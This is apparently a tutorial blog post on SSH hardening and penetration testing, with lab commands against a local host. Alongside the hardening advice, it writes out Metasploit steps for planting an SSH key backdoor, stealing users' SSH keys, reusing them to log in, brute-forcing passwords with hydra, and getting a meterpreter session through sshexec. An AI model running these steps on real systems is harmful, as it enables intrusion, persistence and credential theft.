Probing through every open port is practically the first step hackers take in order to prepare their attack. And in order to work, one is required to keep their port open but at the same time, they are threatened by the fear of hackers. Therefore, one must learn to secure their ports even if they are open. In this post, we will discuss penetration testing of SSH which is also known as Secure Shell.Introduction to SSHThe SSH protocol also stated as Secure Shell is a technique for secure and reliable remote login from one computer to another. It offers several options for strong authentication, as it protects the connections and communications\ with security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP).SSH InstallationIt is very easy to install and configure the ssh service, we can directly install the ssh service by using the OpenSSH-server package from the ubuntu repo. To install any service you must have a root privilege account and then follow the given below command.apt install openssh-serverwhen you will execute the above command it will extract the package the install the default configuration on the host machine. you can check the open port with the help of netstat command on the host machineSSH Port ScanningIf you don’t have direct access to the host machine, use Nmap to remotely identify the port state which is considered to be the initial step of the penetration test. Here we’re going to use Kali Linux to perform penetration testing.So, to identify an open port on a remote network, we will use a version scan of the map that will not only identify an open port but will also perform a banner grabbing that shows the installed version of the service.nmap -sV -p22 192.168.1.103Methods to Connect SSHTerminal Command (Linux)Now execute the following command to access the ssh shell of the remote machine as an authorized user. Username: ignitePassword: 123ssh [email protected] (Windows)Step 1: Install putty.exe and run it, then enter the HOST IP address <192.168.1.103> and port <22>, also choose to connect type as SSH.Step2: To establish a connection between the client and the server, a putty session will be generated that requires a login credential.Username: ignitePassword: 123Port RedirectionBy default, ssh listen on port 22 which means if the attacker identifies port 22 is open then he can try attacks on port 22 in order to connect with the host machine. Therefore, a system admin chooses Port redirection or Port mapping by changing its default port to others in order to receive the connection request from the authorized network.Follow the below steps for port redirection:Step1: Edit the sshd_config from inside the /etc/sshd using the editornano /etc/ssh/sshd_configStep2: Change port 22 into 2222 and save the file.Step3: Then restart sshPort Redirection TestingThus, when we have run the scan on port 22, it has shown port state CLOSE for ssh whereas port 2222 OPEN for ssh which can be seen the given image.Establish SSH connection using RSA keyStrong passwords don’t seem to be decent to secure the server because a brute force attack can crack them. That’s why you need an additional security method to secure the SSH server.SSH key pairs is another necessary feature to authenticate clients to the server. It consists of a long string of characters: a public and a private key. You can place the public key on the server and the private key on the client machine and unlock the server by connecting the private key of the client machine. Once the keys match up, the system permits you to automatically establish an SSH session without the need to type in a password.Ssh-keygen is a tool for creating new authentication key pairs for SSH. Such key pairs are used for automating logins, single sign-on, and for authenticating hosts.Thus, we will follow the steps for generating a key pair for authenticated connection.Step1: Run the given command to generate an ssh key pair (id_rsa and id_rsa.pub) on the host machine Ubuntu.Step 2: Same should be done on the client machine which is authorized to establish the connection with the host machine (ubuntu).Step 3: Once the ssh key pair (id_rsa and id_rsa.pub) get generated then rename the id_rsa.pub into authorized_keys as shown in the given image.Step3: Once the ssh key pair (id_rsa and id_rsa.pub) get generated then rename the id_rsa.pub into authorized_keys as show in the given image.ssh-keygen
cd .ssh
ls
cat id_rsa.pub > authorized_keysStep4: Share the authorized_keys with the host machine by copying it into the .ssh directory.Step5: Edit the sshd_config from inside the /etc/sshd using the editornano /etc/ssh/sshd_configStep6: Enable the “passwordauthentication no” commentAs a result of only the authorized machine which rsa key can establish a connection with the host machine without using password.Now if you need to connect to the ssh server using your password username, the server will drop your connection request because it will authenticate the request that has authorized key.Step7: Copy the id_rsa key from Kali Linux to the windows machine, to established connection using authorized keys on the windows machine,Step8: Install puttygen.exeStep 9: Run puttygen.exe and load the id_rsa and “save as key” named as KeyStep10: Use putty.exe to connect with the host machine by entering hostname 192.168.1.103 and port 22.Step11: Navigate to SSH >auth and browse the key private key that you have saved as mention in step 9.This will establish an ssh connection between windows client and server without using a password.Exploit SSH with MetasploitSSH Key Persistence- Post ExploitationConsider a situation, that by compromising the host machine you have obtained a meterpreter session and want to leave a permanent backdoor that will provide a reverse connection for next time.This can be achieved with the help of the Metasploit module named “SSH Key Persistence-a post exploit” when port 22 is running on the host machine.This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) >exploitAs can be seen in the image given, it added authorized keys to /home / ignite/.ssh and stored a private key within /root/.msf4/lootAs we ensure this by connecting the host machine via port 22 using a private key generated above. Here I have renamed the private as “key” and gave permission 600.chmod 600 key
ssh -i key [email protected]!! It works without any congestion and in this way, we can use ssh key as persistence backdoor.Stealing the SSH keyConsider a situation, that by compromising the host machine you have obtained a meterpreter session and port 22 is open for ssh and you want to steal SSH public key and authorized key. This can be done with the help Metasploit module named “Multi Gather OpenSSH PKI Credentials Collection -a post exploit” as discussed below.This module will collect the contents of all users .ssh directories on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.use post/multi/gather/ssh_creds
msf post(ssh_creds) >set session 1
msf post(ssh_creds) >exploitFrom given below image you can see we have got all authorized keys store in /home/ignite/.ssh directory in our local machine at /root/.msf4/loot and now use those keys for login into an SSH server.This can be done manually by downloading keys directly from inside /home/ignite/.ssh as shown in the below image.As we ensure this by connecting the host machine via port 22 using private key downloaded above. Let’s change the permission for the rsa key and to do this follow the step given below.chmod 600 key
ssh -i key [email protected] works without any congestion and in this way, we can use ssh key as persistence backdoor.SSH login using pubkeyConsidering you have id_rsa key of the host machine and want to obtain meterpreter session via Metasploit and this can be achieved with the help of the following module.This module will test ssh logins on a range of machines using a defined private key file and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory.use auxillary/scanner/ssh /ssh_login_pubkey
auxiliary (scanner/ssh /ssh_login_pubkey)>set rhosts 192.168.1.103
auxiliary (scanner/ssh /ssh_login_pubkey)>set username ignite
auxiliary (scanner/ssh /ssh_login_pubkey)>set key_path /root/.ssh/id_rsa
auxiliary (scanner/ssh /ssh_login_pubkey)>exploitThis will give a command session which can be further updated into the meterpreter session by executing the following command.sessions -u 1SSH Password crackingWe can test a brute force attack on ssh for guessing the password or to test threshold policy while performing penetration testing on SSH. It requires a dictionary for username list and password list, here we have username dictionary “user.txt” and password list named “pass.txt” to perform the brute force attack with the help of hydrahydra -L user.txt -P pass.txt 192.168.1.103 sshAs a result, you can observe that the host machine has no defense against brute force attacks, and we were able to obtain ssh credentials.To protect your service against brute force attacks you can use fail2ban which is an IPS. Read more from here to set up fail2ban IPS in the network.If you will observe the given below image, then it can see here that this time the connection request drops by the host machine when we try to launch a brute force attack.SSH Public Key Login ScannerThis module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory. Only a single passphrase is supported, however, so it must either be shared between subject keys or only belong to a single one.msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.1.103
msf auxiliary(ssh_login_pubkey) > set user_file /root/user.txt
msf auxiliary(ssh_login_pubkey) > set key_path /root/.ssh/id_rsa.pub
msf auxiliary(ssh_login_pubkey) > runAs a result, you can observe that user “ignite” is authorized to use the public to connect with ssh of the host machine.SSH User Code ExecutionThis module connects to the target system and executes the necessary commands to run the specified payload via SSH. If a native payload is specified, an appropriate stager will be used. Thus we gave host IP along with username and password, if everything goes in right then we get meterpreter session on our listening machine.msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) >set rhosts 192.168.1.103
msf exploit(sshexec) >set username ignite
msf exploit(sshexec) >set password 123
msf exploit(sshexec) >set srvhost 192.168.1.107
msf exploit(sshexec) >exploitas a result, you can observe that we have meterpreter session of the host machine.Conclusion: In this post, we try to discuss the possible way to secure SSH and perform penetration testing against such a scenario.
Read More